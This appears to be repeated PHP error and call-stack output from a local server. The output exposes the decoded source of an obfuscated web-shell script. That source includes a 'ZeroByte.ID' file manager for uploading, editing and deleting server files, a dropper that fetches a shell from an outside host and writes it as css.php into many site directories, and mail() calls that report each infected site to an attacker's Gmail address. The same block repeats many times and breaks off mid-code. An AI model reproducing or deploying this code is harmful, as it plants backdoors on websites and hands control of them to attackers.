Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3255541328fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:135
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 136
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3286541328fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:136
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 137
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3304541328fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:137 not exits2done2 .
( ! ) Warning: fopen(C:/wamp64/www/cgi-bin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 145
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3475541328fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:145
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 146
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3497541328fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:146
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 147
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
